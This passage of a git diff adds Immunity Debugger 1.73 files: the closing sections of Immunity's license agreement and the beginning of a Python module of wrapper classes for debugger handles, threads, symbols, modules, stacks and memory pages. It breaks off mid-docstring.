+WHEREAS, Licensee wishes to obtain a license to use the Software for the purpose of facilitating Licensee's business; and
+
+WHEREAS, Licensor is willing to grant a non-exclusive license to Licensee to use the Software pursuant to the terms, conditions, and limitations hereinafter set forth.
+
+NOW, THEREFORE, in consideration of the mutual promises and obligations hereinafter contained, the parties have agreed as follows:
+
+1. Grant of License, Term
+
+1.1 Subject to the terms and conditions of this Agreement, Licensor hereby grants to Licensee a limited, non-exclusive, non-transferable, non-assignable right and license (the "License") to access, download, install and use the Software on the licensed number of computers (identified in Schedule "A") solely for the uses as set forth in Section 2 of this Agreement.
+
+1.2 The term of the License granted herein shall be in perpetuity ("Term"), unless otherwise terminated pursuant with this Agreement.
+
+1.3 Licensor shall deliver to Licensee the Software within 5 business days of the Effective Date.
+
+2. Scope and Use of License
+
+2.1 Licensee agrees that the License granted hereunder is limited to use the Software internally and only in connection with Licensee's business in accordance with the terms of this Agreement.
+
+2.2 Licensee shall not decompile, reverse compile, disassemble, decode or otherwise reverse engineer the Software. Licensee shall not modify or translate the Software or create any derivative works based on the Software. Except as otherwise set forth in this Agreement, Licensee shall not publish, distribute, market, rent, lease, sublicense or assign all or any portion of the Software. Porting the Software to another framework or product is a violation of this license. Using the Software as part of another Product is a violation of this license.
+
+2.3 Licensor reserves the right to terminate this Agreement if it has reason to believe Licensee is using the Software outside the scope of the License.
+
+2.4 Licensee acknowledges that as between the Licensor and Licensee, Licensor is and shall remain the sole owner of the copyrights, patents, trademarks, and other intellectual and proprietary rights associated with the Software, including without limitation, programs, methods of processing, specific design and programming techniques contained therein and any corrections, fixes, enhancements, updates or other modifications to the Software, whether made by Licensor or any third party, as well as the goodwill associated therewith. Nothing in this Agreement shall be deemed to convey to Licensee any ownership or proprietary rights therein and all such rights shall remain the sole and exclusive property of Licensor. Except as otherwise set forth herein, Licensee shall have no right, title or interest in or to the Software. Any rights not specifically granted herein are reserved to Licensor.
+
+2.5 If Licensee creates, distributes, sells, or otherwise produces a software product used for anti-virus, anti-malware or intrusion detection protection then Licensee will not include signatures for Software files or programs within their product.
+
+2.6 Licensor reserves right to store and redistribute usage and statistical information related to the Software for market research, advertising and other purposes.
+
+3. Terms of Payment
+
+3.1 In full consideration for the License, Licensee shall pay to Licensor the fee (the "Fee"), in the amounts at the times and under the terms as set forth in Schedule B.
+
+3.2 Licensee on demand shall pay or reimburse Licensor for all duties, sales taxes, other taxes and other charges relating to the Software, the License or payments hereunder imposed by the United States taxing authorities, with the sole exception of taxes on Licensor's income.
+
+4. Maintenance.
+
+4.1 No maintenance support services are included with this license.
+
+5. Confidentiality
+
+For purposes of this Agreement, "Confidential Information" includes all trade secrets and confidential information of Licensor including the Software (both source and object code), and documentation, algorithms, development techniques, methodologies, formulae, business plans, research and development strategies, customer and prospect names and lists, work product resulting from or related to the Software, internal personnel, financial, marketing and other business information, and product and service prices, as well as know-how and proprietary information related to the foregoing, (collectively, the "Confidential Information"). Licensee acknowledges that (i) pursuant to this Agreement, Licensee may learn of Confidential Information or otherwise have access to Confidential Information, of Licensor (ii) such Confidential Information constitutes highly valuable information of Licensor not generally known by Licensor's competitors, and (iii) that disclosure of such Confidential Information to competitors of Licensor or other third parties would cause undue harm to Licensor. As such, except as otherwise expressly provided herein, Licensee will retain in strict confidence the Confidential Information and use its best efforts to protect the same by preventing unauthorized disclosure, copying, use, distribution, installation, or transfer of possession of the Confidential Information. If Licensee violates any of the provisions of this Agreement, including, but not limited to this Section 5, Licensor (in addition to any other and additional rights and remedies it may have at law, in equity, or by statute) shall be entitled to immediate and permanent injunctive relief, it being agreed that the damages that Licensor would sustain upon such violation are difficult or impossible to ascertain in advance. The posting of a bond shall not be required as a pre-condition to such injunctive relief.
+
+6. Reciprocal Grant of License
+
+If Licensee sends Licensor patches, source codes, or other information, this information, source codes, or similar, will be considered licensed to Licensor for distribution, re-licensing, sale, or inclusion with the Software if so decided by Licensor. Licensee hereby grants to Immunity and its assigns the irrevocable, permanent right to conduct security testing (including, but not limited to the right to disassemble, decompile, reverse engineer) on any software written or distributed by Licensee and to distribute and otherwise use the results of such testing. Licensee agrees that these rights superceed any and all licenses including those distributed with Licensee's software as End User License Agreements. This clause shall survive any termination of this, or any other, license. Any information required to perform security testing or distribute the results of security testing shall not be considered Confidential information by the parties of this agreement. Any process conducted by Licensee to perform security testing shall not be considered outside of Licensee's rights. This superceeds other agreements which may be entered into by Licensee or Licensor.
+
+7. Termination
+
+7.1. Licensor may terminate the License on the occurrence of any one or more of the following events: (a) if Licensee is in default of any payment required to be made by Licensee hereunder when due as herein provided and such default continues for a period of ten (10) days after Licensor's written notice thereof to Licensee; (b) immediately if Licensee shall have defaulted in observing or performing any covenant or agreement as set forth in Section 5 hereunder or any other violation or breach of the terms of this Agreement.
+
+The provisions of Section 2.3 shall govern any termination of this Agreement by Licensor for defaults by Licensee under Section 2.3 of this Agreement. In the event that the License is terminated, the maintenance services shall be deemed automatically terminated and Licensor shall have no obligation to refund to Licensee any portion of the Maintenance Fee.
+
+7.2. The provisions contained in paragraphs 2.3, 2.4, 5, 7, 8 & 11 shall survive the termination of this Agreement.
+
+7.3. After the termination of this Agreement, Licensee shall (i) have no further License or other rights with respect to the Software and (ii) return or destroy, if directed by Licensor, the Software including any and all back-up copies of the Software.
+
+8. Warranties; Disclaimers and Limitation of Liability
+
+THE SOFTWARE (INCLUDING ALL INFORMATION AND INTELLECTUAL PROPERTY CONTAINED THEREIN) IS PROVIDED "AS-IS", AND NO WARRANTIES OF ANY KIND (INCLUDING IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT), EXPRESS OR IMPLIED ARE MADE. LICENSOR (INCLUDING ITS OFFICERS, DIRECTORS, SHAREHOLDERS, EMPLOYEES AND AGENTS) SHALL NOT UNDER ANY CIRCUMSTANCES BE LIABLE TO LICENSEE FOR INDIRECT, SPECIAL, CONSEQUENTIAL, PUNITIVE, INCIDENTAL, LOST DATA OR LOST PROFITS OR OTHER DAMAGES ARISING FROM THIS AGREEMENT INCLUDING BY REASON OF NEGLIGENCE, STRICT LIABILITY, OR BREACH OF WARRANTY OR CONTRACT, EVEN IF LICENSOR HAS BEEN ADVISED OF (OR KNOWS OR SHOULD KNOW OF) THE POSSIBILITY OF SUCH DAMAGES. THE WARRANTY DISCLAIMER AND LIMITTATIONS OF LIABILITY, BELOW, ARE FUNDAMENTAL ELEMENTS OF THE BASIS OF THE BARGAIN BETWEEN LICENSOR AND LICENSEE. LICENSOR WOULD NOT BE ABLE TO PROVIDE THE SOFTWARE WITHOUT SUCH LIMITATIONS. LICENSOR'S ENTIRE LIABILITY TO LICENSEE OR ANY THIRD PARTY UNDER THIS AGREEMENT, IF ANY, FOR ANY CLAIM(S) FOR DAMAGES RELATING TO THE SOFTWARE, WHETHER BASED IN CONTRACT, NEGLIGENCE, OR OTHERWISE SHALL BE LIMITED TO THE AMOUNT OF THE LICENSE FEE PAID BY LICENSEE FOR THE SOFTWARE WHICH IS THE BASIS OF THE CLAIM(S). EXCEPT AS SET FORTH HEREIN, LICENSOR (INCLUDING ITS OFFICERS, DIRECTORS, SHAREHOLDERS, EMPLOYEES AND AGENTS) SPECIFICALLY DISCLAIMS LIABILITY FOR THE FITNESS, ACCURACY OR COMPLETENESS OF THE SOFTWARE AND FOR ANY AND ALL DAMAGE INCURRED WHILE USING THE SOFTWARE. LICENSEE ASSUMES ALL RISKS AS TO THE SUITABILITY OF THE SOFTWARE.
+
+9. Indemnification
+
+Licensee hereby agrees to defend, indemnify and hold harmless Licensor, its officers, directors, shareholders, employees and agents from and against any and all losses, claims, costs, damages, liabilities and expenses of any nature (including without limitation, attorneys' fees) incurred, arising out of or related to or in connection with any breach of Licensee's obligations, representations, duties or warranties contained herein.
+
+10. Export
+
+Licensee acknowledges that the Software may be subject to United States re-export regulations. Specifically, Licensee agrees and certifies that the Software, technical data or information provided by Licensor, or the direct product thereof, will not be re-exported except as permitted by United States laws and regulations, and the prior written authorization of Licensor. Licensee shall be solely responsible for compliance with all laws and regulations applicable to export of the Software outside of the United States of America pursuant to this Agreement. Licensee shall defend and indemnify Licensor against any costs, expenses, fines and other liability for failure to so comply, provided that Licensor shall cooperate with all reasonable requests from Licensee for information.
+
+11. Entire Agreement; Modification
+
+The terms and conditions herein contained constitute the entire agreement between the parties and supersede all previous commitments, agreements, and understandings, whether oral or written, between the parties hereto with respect to the subject matter hereof and no previous agreement or understanding varying or extending the same shall be binding upon any party hereto. Immunity reserves the right to modify this agreement for future versions of the Software.
+
+12. Severability
+
+If a provision herein contained shall be held by any court of competent jurisdiction to be illegal, void or unenforceable, such provision shall be of no force or effect while such infirmity shall exist, but such infirmity shall have no effect whatsoever upon the binding force or effectiveness of any of the other provisions hereof, it being the intention of the parties hereto that had they, or either of them, known of such infirmity, they would have entered into a contract, each with the other, containing all of the other provisions hereof.
+
+13. Governing Law, Jurisdiction and Venue
+
+This Agreement shall be governed by and construed in accordance with the laws of the State of New York without giving effect to the conflicts of laws principles thereof. The parties hereto each hereby irrevocably submit to the exclusive jurisdiction and venue of the state courts of the State of New York, New York County, and to the jurisdiction of the United States District Court for the Southern District of New York for the purposes of any suit, action or other proceeding arising out of or based upon this Agreement or the subject matter hereto.
+
+12. Force Majeure
+
+In the event of a party failing to perform any obligation under this Agreement (except the making of any payment due under or pursuant to this Agreement) as a result of strike, lockout or other labor difficulties, fire, flood, act of God, embargo, act of war, regulation or restriction of government or law or any other occurrence of circumstance beyond the reasonable control of the party, that party shall not be liable in damages or otherwise for failure to perform that obligation and such failure shall not be a ground for terminating this Agreement.
+
+13. Notices
+
+Any notice or other communication required or made pursuant to this Agreement shall be in writing; shall be given either personally, by receipted mail, or by nationally recognized overnight courier (with receipt); and shall be deemed duly and properly given if and when mailed by special delivery with all charges prepaid, and addressed to the parties at the following addresses or to such other address as a party may by like notice designate:
+
+If to Licensor to:
+ Immunity, Inc.
+ 1247 Alton Road
+ Miami Beach, Florida, 33139
+ Attention: Justine Aitel, CEO
+
+with a copy to:
+
+ Meister Seelig & Fein LLP
+ 140 East 45th Street, 19th Floor
+ New York, New York 10017
+ Attention: Debora A. Stegich, Esq.
+
+14. Counterparts
+
+This Agreement may be executed in one or more counterparts, each of which shall be deemed an original, but all of which together shall constitute one and the same instrument.
+
+15. Authority; Relationship Each party represents and warrants that on this date they are duly authorized to bind their respective principals by their agreement. The parties hereto are independent contractors and nothing contained herein shall be construed as creating any agency, partnership, joint venture or other form of joint enterprise between the parties.
+
+16. Successors and Assigns This Agreement will be binding on the parties' respective successors and permitted assigns. This Agreement may not be assigned or sublicensed by Licensee without the prior written consent of Licensor and provided further, such assignee or sublicensee agrees to accept and be bound by the terms and conditions of this Agreement.
+
+17. Headings
+
+The headings and subheadings contained in this Agreement are for convenience of reference only and will not be considered in construing this Agreement.
+
+18. Advertising Disclaimer
+
+Immunity makes no representations concerning any endeavor to review the content of advertisements appearing in the Software or any sites listed in the advertisements, however Immunity reserves the right to accept or reject any submitted advertisement for no reason.
+
+Immunity does not attempt to investigate or verify claims, including claims of capability, benefits, or compensation made in advertisements appearing in the Software.
+
+The appearance of advertising in the Software in no way implies endorsement or approval by Immunity of any advertising claims or of the advertiser, its products, or services, or any of the sites or services that may be referenced or linked to via advertisements. Advertising information does not necessarily reflect the opinions of Immunity or any of its employees or clients. Advertising material is not guaranteed to be correct, complete, or up to date. Immunity encourages discretion while browsing advertisements. Advertisements may direct browsers to sites containing information that some people may find offensive or inappropriate.
+
+The advertising service and the advertisements appearing in the Software are provided by Immunity on an "as is" basis and Immunity expressly disclaims any and all warranties and any liability whatsoever in connection with advertising appearing in the Software. In no event shall Immunity be liable for any direct, indirect, incidental, punitive or consequential damages of any kind whatsoever with respect to the advertising service or the advertisement contents in the Software.
+
+Any copyrighted material appearing in Immunity advertising, not sanctioned by the copyright holder, is unintentional. Please notify Immunity as soon as possible if any such unsanctioned material exists in Immunity advertising. If proof is shown, Immunity will delete such material or obtain permission from the copyright holder.
+
+Immunity cannot guarantee advertisements submitted for display in the Software will be received or processed.
+19. Data
+All data and other information derived or resulting from, or collected through or in connection with, the use, installation, accessing and/or provision of the Software to or by Licensee (collectively, "Data") shall be and remain the property of Licensor. Licensee understands, acknowledges and agrees that Licensor may use such Data, as well as disclose and provide access to such Data to third parties, for any purposes whatsoever.
+SCHEDULE A
+
+THE SOFTWARE
+
+Software includes Immunity Software ("Software Products") that is capable of application analysis. The Software Products are as follows:
+
+Immunity Debugger
+
+SCHEDULE "B"
+
+Licensee shall pay Licensor no fee.
\ No newline at end of file
diff --git a/1.73/Libs/__init__.py b/1.73/Libs/__init__.py
new file mode 100755
index 0000000..435b262
--- /dev/null
+++ b/1.73/Libs/__init__.py
@@ -0,0 +1 @@
+all = ["immutils"] #for now
diff --git a/1.73/Libs/debugtypes.py b/1.73/Libs/debugtypes.py
new file mode 100755
index 0000000..7baefa0
--- /dev/null
+++ b/1.73/Libs/debugtypes.py
@@ -0,0 +1,1184 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+
+"""
+
+__version__ = '1.0'
+
+import debugger
+import struct
+
+###ulong
+# handle = handle
+# handles[handle][0]=type
+# handles[handle][1]=access
+# handles[handle][2]=data1
+# handles[handle][3]=data2
+### int
+# handles[handle][4]=refcount
+###char
+# handles[handle][5]=htype
+# handles[handle][6]=username
+# handles[handle][7]=nativename
+
+class Handle:
+ def __init__(self, handle):
+ self.handle = handle
+ self.type = 0
+ self.access = 0
+ self.data1 = 0
+ self.data2 = 0
+ self.refcount = 0
+ self.htype = ""
+ self.username = ""
+ self.nativename = ""
+
+ def _getfromtuple(self, mem):
+ self.type = mem[0]
+ self.access = mem[1]
+ self.data1 = mem[2]
+ self.data2 = mem[3]
+ self.refcount = mem[4]
+ self.htype = mem[5]
+ self.username = mem[6]
+ self.nativename = mem[7]
+
+ def getHandle(self):
+ return self.handle
+
+ def getType(self):
+ return self.type
+
+ def getAccess(self):
+ return self.access
+
+ def getData1(self):
+ return self.data1
+
+ def getData2(self):
+ return self.data2
+
+ def getRefCount(self):
+ return self.refcount
+
+ def getHtype(self):
+ return self.htype
+
+ def getUserName(self):
+ return self.username
+
+ def getNativeName(self):
+ return self.nativename
+
+class Thread:
+ def __init__(self, thread):
+ self.thread = thread
+ self.entry = 0
+ self.threadid = 0
+ self.datablock = 0
+ self.stacktop = 0
+ self.stackbottom = 0
+ self.status = 0
+
+
+ def _getfromtuple(self, thread):
+ self.threadid = thread[0]
+ self.entry = thread[1]
+ self.datablock = thread[2]
+ self.stacktop = thread[3]
+ self.stackbottom = thread[4]
+ self.status = thread[5]
+
+
+ def getEntry(self):
+ return self.entry
+
+ def getId(self):
+ return self.threadid
+
+ def getdatablock(self):
+ return self.datablock
+
+ def getStackTop(self):
+ return self.stacktop
+
+ def getStackBottom(self):
+ return self.stackbottom
+
+ def getStatus(self):
+ return self.status
+
+
+class Symbol:
+ def __init__(self, addr):
+ self.address = addr
+ self.section = ""
+ self.type = ""
+ self.name = ""
+ self.comment = ""
+ self.module = ""
+
+ def _getfromtuple(self, tup):
+ self.module = tup[0].strip()
+ self.module = self.module.lower()
+
+ self.section = tup[1]
+ self.type = tup[2]
+ self.name = tup[3]
+ self.comment = tup[4]
+
+ def getAddress(self):
+ return self.address
+
+ def getModule(self):
+ return self.module
+
+ def getSection(self):
+ return self.section
+
+ def getType(self):
+ return self.type
+
+ def getName(self):
+ return self.name
+
+ def getComment(self):
+ return self.comment
+
+
+#Base address of module: base
+#Size occupied by module: size
+#service information, TY_xxx: type
+#base address of module code block: codebase
+#size of module code block: codesize
+#Base address of resources: resbase
+#Size of resources: ressize
+#Address of or NULL: entry
+#Base address of module data block: database
+#Base address of import data table: idatatable
+#Base address of import data block: idatabase
+#Base address of export data table: edatatable
+#Size of export data table: edatasize
+#Base address of relocation table: reloctable
+#Size of relocation table: relocsize
+#Short name of the module: name
+#Full name of the module: path
+#Number of sections in the module: nsect
+#Total size of headers in executable: headersize
+#Base of image in executable file: fixupbase
+#Decoded code features or NULL: codedec
+#Code CRC for actual decoding: codecrc
+#Hit tracing data or NULL: hittrace
+#Decoded data features or NULL: datadec
+#Global types from debug info: globaltypes
+#Address of WinMain() etc. in dbg data: mainentry
+#Entry of packed code or NULL: realsfxentry
+#Original size of module code block: origcodesize
+#Base of memory block with SFX: sfxbase
+#Size of memory block with SFX: sfxsize
+#Whether system DLL: issystemdll
+#Version of executable file: version
+class Module:
+ def __init__(self, name, baseaddress, size, entrypoint):
+ """
+ Module Information
+
+ @type name: STRING
+ @param name: Name of the module
+
+ @type baseaddress: DWORD
+ @param baseaddress: Base Address of the Module
+
+ @type size: DWORD
+ @param size: Size of the Module
+
+ @type entrypoint: DWORD
+ @param entrypoint: Entry Point
+ """
+ # for modulos in mods.keys():
+ # name : modulos
+ # base addy: mods[modulos][0]
+ # size : mods[modulos][1]
+ # entry : mods[modulos][2]
+ # full path: mods[modulos][3]
+
+ self.name = name.lower()
+ self.baseaddress = baseaddress
+ self.size = size
+ self.entrypoint = entrypoint
+ self.modDict = None
+ self.symbols = []
+ self.XREFto = {}
+ self.XREFfrom = {}
+
+ def getFunctions(self):
+ """
+ Get the all the functions from Module
+
+ @rtype: LIST of DWORD
+ @return: A List of the address of all function
+ """
+ return debugger.Getallfunctions(self.baseaddress)
+
+ def _xrefs(self, address, XREF, debugger_callback):
+ code = self.getCodebase()
+ codesize = self.getCodesize()
+
+ # We first check check if address is inside this module code
+ if address >= code and address <= (code+codesize):
+ return []
+
+ # If we didn't get the whole xref list from debugger, we get it
+ if not XREF:
+ XREF = debugger_callback(address)
+
+ # returning the xrefs as a list of (addy, type)
+ try:
+ return XREF[address]
+ except KeyError:
+ return []
+
+ def getXrefTo(self, address):
+ """
+ Get the Xreference to the given address
+
+ @type address: DWORD
+ @param address: Address in the Module to get Xref to
+
+ @rtype: LIST of DWORD
+ @return: List of Address
+ """
+ return self._xrefs(address, self.XREFto, debugger.Getxref_to)
+
+ def getXrefFrom(self, address):
+ """
+ Get the Xreference from the given address
+
+ @type address: DWORD
+ @param address: Address in the Module to get Xref from
+
+ @rtype: LIST of DWORD
+ @return: List of Address
+ """
+ return self._xrefs(address, self.XREFfrom, debugger.Getxref_from)
+
+ def getBaseAddress(self):
+ """
+ Get the Base Address
+
+ @rtype: DWORD
+ @return: Base Address
+ """
+ return self.baseaddress
+
+ def getReferencedStrings(self):
+ return debugger.Getreferencedstrings(self.entrypoint)
+
+ def setModuleExtension(self, mod_dict):
+ self.modDict = mod_dict
+
+ def setSymbols(self, symbol):
+ self.symbols = symbol
+
+ def Analyse(self):
+ """
+ Analize the Current Module
+ """
+ return debugger.Analysecode(self.baseaddress)
+
+ def get(self, name):
+ name = name.lower()
+ if not self.modDict.has_key(name):
+ return None
+ return self.modDict[name][0]
+
+ def getSymbols(self):
+ return self.symbols
+
+ def getBase(self):
+ """
+ Get Base from module
+
+ @rtype: DWORD
+ @return: Base from the module
+ """
+ try:
+ return self.modDict['base'][0]
+ except KeyError:
+ return None
+
+ def getSize(self):
+ """
+ Get Size from module
+ """
+ try:
+ return self.modDict['size'][0]
+ except KeyError:
+ return None
+
+ def getType(self):
+ """
+ Get Type from module
+ """
+ try:
+ return self.modDict['type'][0]
+ except KeyError:
+ return None
+
+ def getCodebase(self):
+ """
+ Get Codebase from module
+ """
+ try:
+ return self.modDict['codebase'][0]
+ except KeyError:
+ return None
+
+ def getCodesize(self):
+ """
+ Get Codesize from module
+
+ @rtype: DWORD
+ @return: Code Size
+ """
+ try:
+ return self.modDict['codesize'][0]
+ except KeyError:
+ return None
+
+ def getResbase(self):
+ """
+ Get Resbase from module
+
+ @rtype: DWORD
+ @return: Res Base
+
+ """
+ try:
+ return self.modDict['resbase'][0]
+ except KeyError:
+ return None
+
+ def getRessize(self):
+ """
+ Get Ressize from module
+
+ @rtype: DWORD
+ @return: Res Size
+ """
+ try:
+ return self.modDict['ressize'][0]
+ except KeyError:
+ return None
+
+ def getEntry(self):
+ """
+ Get Entry from module
+
+ @rtype: DWORD
+ @return: Entry
+ """
+ try:
+ return self.modDict['entry'][0]
+ except KeyError:
+ return None
+
+ def getDatabase(self):
+ """
+ Get Database from module
+
+ @rtype: DWORD
+ @return: Database
+ """
+ try:
+ return self.modDict['database'][0]
+ except KeyError:
+ return None
+
+ def getIdatatable(self):
+ """
+ Get Idatatable from module
+ """
+ try:
+ return self.modDict['idatatable'][0]
+ except KeyError:
+ return None
+
+ def getIdatabase(self):
+ """Get Idatabase from module"""
+ try:
+ return self.modDict['idatabase'][0]
+ except KeyError:
+ return None
+
+ def getEdatatable(self):
+ """
+ Get Edatatable from module
+ """
+ try:
+ return self.modDict['edatatable'][0]
+ except KeyError:
+ return None
+
+ def getEdatasize(self):
+ """
+ Get Edatasize from module
+ """
+ try:
+ return self.modDict['edatasize'][0]
+ except KeyError:
+ return None
+
+ def getReloctable(self):
+ """
+ Get Reloctable from module
+ """
+ try:
+ return self.modDict['reloctable'][0]
+ except KeyError:
+ return None
+
+ def getRelocsize(self):
+ """
+ Get Relocsize from module
+ """
+ try:
+ return self.modDict['relocsize'][0]
+ except KeyError:
+ return None
+
+ def getName(self):
+ """
+ Get Name from module
+ """
+ try:
+ return self.name
+ except KeyError:
+ return None
+
+ def getPath(self):
+ """
+ Get Path from module
+ """
+ try:
+ return self.modDict['path'][0]
+ except KeyError:
+ return None
+
+ def getNsect(self):
+ """
+ Get Nsect from module
+ """
+ try:
+ return self.modDict['nsect'][0]
+ except KeyError:
+ return None
+
+ def getHeadersize(self):
+ """
+ Get Headersize from module
+ """
+ try:
+ return self.modDict['headersize'][0]
+ except KeyError:
+ return None
+
+ def getFixupbase(self):
+ """
+ Get Fixupbase from module
+ """
+ try:
+ return self.modDict['fixupbase'][0]
+ except KeyError:
+ return None
+
+ def getCodedec(self):
+ """
+ Get Codedec from module
+ """
+ try:
+ return self.modDict['codedec'][0]
+ except KeyError:
+ return None
+
+ def getCodecrc(self):
+ """
+ Get Codecrc from module
+ """
+ try:
+ return self.modDict['codecrc'][0]
+ except KeyError:
+ return None
+
+ def getHittrace(self):
+ """
+ Get Hittrace from module
+ """
+ try:
+ return self.modDict['hittrace'][0]
+ except KeyError:
+ return None
+
+ def getDatadec(self):
+ """
+ Get Datadec from module
+ """
+ try:
+ return self.modDict['datadec'][0]
+ except KeyError:
+ return None
+
+ def getGlobaltypes(self):
+ """
+ Get Globaltypes from module
+ """
+ try:
+ return self.modDict['globaltypes'][0]
+ except KeyError:
+ return None
+
+ def getMainentry(self):
+ """
+ Get Mainentry from module
+ """
+ try:
+ return self.modDict['mainentry'][0]
+ except KeyError:
+ return None
+
+ def getRealsfxentry(self):
+ """
+ Get Realsfxentry from module
+ """
+ try:
+ return self.modDict['realsfxentry'][0]
+ except KeyError:
+ return None
+
+ def getOrigcodesize(self):
+ """
+ Get Origcodesize from module
+ """
+ try:
+ return self.modDict['origcodesize'][0]
+ except KeyError:
+ return None
+
+ def getSfxbase(self):
+ """
+ Get Sfxbase from module
+ """
+ try:
+ return self.modDict['sfxbase'][0]
+ except KeyError:
+ return None
+
+ def getSfxsize(self):
+ """
+ Get Sfxsize from module
+ """
+ try:
+ return self.modDict['sfxsize'][0]
+ except KeyError:
+ return None
+
+ def getIssystemdll(self):
+ """
+ Get Issystemdll from module
+ """
+ try:
+ return self.modDict['issystemdll'][0]
+ except KeyError:
+ return None
+
+ def getVersion(self):
+ """
+ Get Version from module
+ """
+ try:
+ return self.modDict['version'][0]
+ except KeyError:
+ return None
+
+ def isAnalysed(self):
+ """
+ Check if module was analysed
+ """
+ # we should check every time, cause the module might be analysed. Since modules are cached sometimes
+ return debugger.IsAnalysed(self.baseaddress)
+
+ def getJumpList(self):
+ """
+ get jump list from analysed module
+ """
+ #jumplist[0] = from
+ #jumplist[1] = to
+ #jumplist[2] = type
+ #type is one of
+ #define JT_JUMP 0 // Unconditional jump
+ #define JT_COND 1 // Conditional jump
+ #define qJT_SWITCH 2 // Jump via switch table
+ #define JT_CALL 3 // Local (intramodular) call
+ #define CALL_INTER 4 // intermodular call
+ #jmpTypeFlags = {"JUMP":0,\
+ #"JUMP_COND":1,\
+ #"JUMP_SWITCH":2,\
+ #"CALL":3,\
+ #"CALL_INTER":4}
+ try:
+ return self.modDict['jumplist'][0]
+ except KeyError:
+ return None
+
+
+class Stack:
+ def __init__(self):
+ self.address = 0 # stack pointer
+ self.stack = 0
+ self.procedure = ""
+ self.calledfrom = 0
+ self.frame = 0 # frame pointer
+ # args
+ self.stackdump1 = 0
+ self.stackdump2 = 0
+ self.stackdump3 = 0
+
+ def _setfromtuple(self, s):
+ self.address = s[0] # stack pointer
+ self.stack = s[1]
+ self.procedure = str(s[2])
+ self.calledfrom = s[3]
+ self.frame = s[4] # frame pointer
+ self.stackdump1 = s[5]
+ self.stackdump2 = s[6]
+ self.stackdump3 = s[7]
+
+
+ def getStackDump(self):
+ return (self.stackdump1,self.stackdump2,self.stackdump3)
+
+ def getAddress(self):
+ return self.address
+
+ def getStack(self):
+ return self.stack
+
+ def getProcedure(self):
+ return self.procedure
+
+ def getFrame(self):
+ return self.frame
+
+ def getCalledFrom(self):
+ return self.calledfrom
+
+
+class Table:
+ def __init__(self,imm,title,col_titles):
+ """
+ Create a GUI Window Table
+
+ @type imm: Debugger Object
+ @param imm: Debugger
+
+ @type title: STRING
+ @param title: Title for the Window
+
+ @type col_titles: LIST of STRINGs
+ @param col_titles: List of the Column's Name
+ """
+ self.instance=self.createTable(title,col_titles)
+
+ def createTable(self,title,col_titles):
+ title1=""
+ title2=""
+ title3=""
+ title4=""
+ title5=""
+ if len(col_titles) > 5:
+ maxcol=5
+ else:
+ maxcol=len(col_titles)
+ try:
+ title1=col_titles[0]
+ except:
+ pass
+ try:
+ title2=col_titles[1]
+ except:
+ pass
+ try:
+ title3=col_titles[2]
+ except:
+ pass
+ try:
+ title4=col_titles[3]
+ except:
+ pass
+ try:
+ title5=col_titles[4]
+ except:
+ pass
+ return debugger.Createtable(title,maxcol,title1,title2,title3,title4,title5)
+
+ # Focus not implemented yet
+ def Log(self, data, address=0, focus = False):
+ """
+ Add a message into a column
+
+ @type data: STRING
+ @param data: Message for the column
+
+ @type address: DWORD
+ @param address: (Optional, Default: 0) Address related to the message
+
+ @type focus: BOOLEAN
+ @param focus: (Optional, Default: False) Whether or not give focus to the window
+ """
+ return debugger.Addtotable(self.instance,address,"0x%08x" % address, data,"","","")
+
+
+ def isValidHandle(self):
+ return debugger.IsValidHandle(self.instance)
+
+
+ def add(self,address,data):
+ """
+ Add Data to the Window
+
+ @type address: DWORD
+ @param address: Address related to the Data
+
+ @type data: LIST OF STRING
+ @param data: Data to add on the different columns
+ """
+ col1=""
+ col2=""
+ col3=""
+ col4=""
+ col5=""
+ if not address:
+ address=0x0
+ try:
+ col1=data[0]
+ except:
+ pass
+ try:
+ col2=data[1]
+ except:
+ pass
+ try:
+ col3=data[2]
+ except:
+ pass
+ try:
+ col4=data[3]
+ except:
+ pass
+ try:
+ col5=data[4]
+ except:
+ pass
+ return debugger.Addtotable(self.instance,address,col1,col2,col3,col4,col5)
+
+
+MemoryProtection = { 0x10 : "PAGE_EXECUTE", 0x20 : "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",\
+ 0x80 : "PAGE_EXECUTE_WRITECOPY", 0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY",\
+ 0x04 : "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY" }
+
+class MemoryPage:
+ def __init__(self, baseaddress, imm):
+ """
+ Memory Page Information
+
+ @type baseaddress: DWORD
+ @param baseaddress: Base Address of the Memory Page
+
+ @type imm: Debugger OBJECT
+ @param imm: Debugger
+ """
+ self.baseaddress = baseaddress
+ self.imm = imm
+ self.size = 0
+ self.type = 0
+ self.owner = 0
+ self.initaccess = 0
+ self.access = 0
+ self.threadid = 0
+ self.section = ""
+ self.mem = ""
+
+ def _getfromtuple(self, mem):
+ requery = debugger.VmQuery(self.baseaddress)
+ self.size = mem[0]
+ self.type = mem[1]
+ self.owner = mem[2]
+ self.initaccess = requery[4]
+ self.access = requery[3]
+ self.threadid = mem[5]
+ self.section = mem[6]
+
+ def getBaseAddress(self):
+ return self.baseaddress
+
+ def getSize(self):
+ return self.size
+
+ def getType(self):
+ """
+ Get Type of Memory Page
+
+ @rtype: DWORD
+ @return: Type of Page
+ """
+ return self.type
+
+ def getOwner(self):
+ """
+ Get the Owner of the Memory Page
+
+ @rtype: STRING
+ @return: Owner of the Page
+ """
+ # use to use getModulebyAddress
+ mod = self.imm.findModule(self.owner)
+ if not mod:
+ return "0x%08x" % self.owner
+ else:
+ return mod[0]
+
+ def _getflags(self, page):
+ try:
+ return PageFlags[page]
+ except KeyError:
+ return " "
+
+ def getInitAccess(self,human=0):
+ """
+ Get the Intial Access Flag of the Memory Page
+
+ @type human: Human Readable String Flag
+ @param human: Boolean
+
+ @rtype: DWORD
+ @return: Initial Access Flag
+
+
+ """
+ if human == 0:
+ return self.initaccess
+ else:
+ return MemoryProtection[self.initaccess & 0xFF]
+
+ def getAccess(self,human=0):
+ """
+ Get the Access Flag of the Memory Page
+
+ @type human: Human Readable String Flag
+ @param human: Boolean
+
+ @rtype: DWORD
+ @return: Access Flag
+ """
+ if human == 0:
+ return self.access
+ else:
+ return MemoryProtection[self.access & 0xFF]
+
+
+
+ def getThreadID(self):
+ """
+ Get the ID of the Thread
+
+ @rtype: DWORD
+ @return: Thread ID
+ """
+ return self.threadid
+
+ def getMemory(self):
+ """
+ Get the Memory of the Page
+
+ @rtype: BUFFER
